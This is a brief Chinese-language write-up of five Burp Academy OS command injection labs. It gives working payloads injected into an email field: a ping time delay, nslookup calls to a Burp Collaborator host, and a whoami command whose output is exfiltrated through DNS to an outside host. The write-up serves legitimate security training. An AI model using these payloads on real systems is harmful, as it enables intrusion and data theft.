1.OS command injection, simple case。
2.Blind OS command injection with time delays
3.Blind OS command injection with output redirection
4.Blind OS command injection with out-of-band interaction
5.Blind OS command injection with out-of-band data exfiltration

1.OS command injection, simple case。

最简单的命令执行，【|】两个只要有一个为True就执行
Burp学院-OS命令注入 - 图1

2.Blind OS command injection with time delays

有时间延迟的盲命令注入
点击Submits feedback
email里先截断||再输入命令再隔离||
123@123.123||ping+-c+10+127.0.0.1||

3.Blind OS command injection with output redirection

带输出重定向的盲命令注入
先通过email写入一个文件，然后通过加载图片的filename调用该文件
Burp学院-OS命令注入 - 图2
首页抓包修改filename参数命令注入：
这里必须写入output.txt，其他没有的文件无法读取： no such file
Burp学院-OS命令注入 - 图3

4.Blind OS command injection with out-of-band interaction

带外交互的盲命令注入，需要使用Burp Collaborator
email=x||nslookup+burpcollaborator.net||
或
||nslookup+6mt98naz1z5qfv5laxona3nh68cy0n.burpcollaborator.net||

5.Blind OS command injection with out-of-band data exfiltration

带外数据渗透的盲命令注入，需要使用Burp Collaborator
email=||nslookup+whoami.YOUR-SUBDOMAIN-HERE.burpcollaborator.net||
+必须有，【whoami.】必须有。输出格式是whoami.client
Burp学院-OS命令注入 - 图4